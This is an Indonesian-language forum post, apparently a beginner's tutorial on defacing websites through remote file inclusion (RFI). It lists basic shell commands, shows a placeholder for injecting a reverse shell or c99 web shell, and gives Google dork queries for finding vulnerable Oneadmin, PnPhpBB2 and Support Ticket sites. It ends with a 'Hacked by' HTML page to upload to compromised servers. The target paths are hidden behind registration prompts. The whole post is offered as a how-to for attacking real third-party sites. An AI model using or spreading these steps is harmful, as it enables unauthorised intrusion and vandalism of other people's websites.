Cara deface Via RFI
Posted on 17.28 by GALANG MEGAH
cara Mudah Deface Remote File Include
Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..
cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
find = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url
[EvilShellInject] = inject rshell / c99 kamu
Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :
Googling ajah, sebelumnya cari dulu RFI di
[You must be registered and logged in to see this link.]- Site Oneadmin RFI
Kamu Search di Google masukkan dulu dork nya ya kan " oneadmin site:.com / oneadmin site:com" tanpa tanda petik ya beroh.
nah sekarang saya kasi contoh pathnya …
[You must be registered and logged in to see this link.]Contoh :
[You must be registered and logged in to see this link.]- PnPhpBB2
Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang ane kasi contoh pathnya …
[You must be registered and logged in to see this link.]Contoh :
[You must be registered and logged in to see this link.]- Support Ticket
Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang saya kasi contoh pathnya …
[You must be registered and logged in to see this link.]Contoh : …
[You must be registered and logged in to see this link.]Hehehe Lumayan banyak kan ? Nah selamat mencobanya..
Nah setelah itu buatlah sebuad file untuk halaman deface kamu bro.
Isi dengan:
<html>
Hacked by Nama Kamu
</html>
Kemudian upload dah file ke directorynya
kemudian buka website yang telah di deface:
[You must be registered and logged in to see this link.]nih contoh hasil deface ane :D
[You must be registered and logged in to see this link.]sekian dlu ya bro ntr ane mau pos tentang cara deface lainnya ,
hehehehe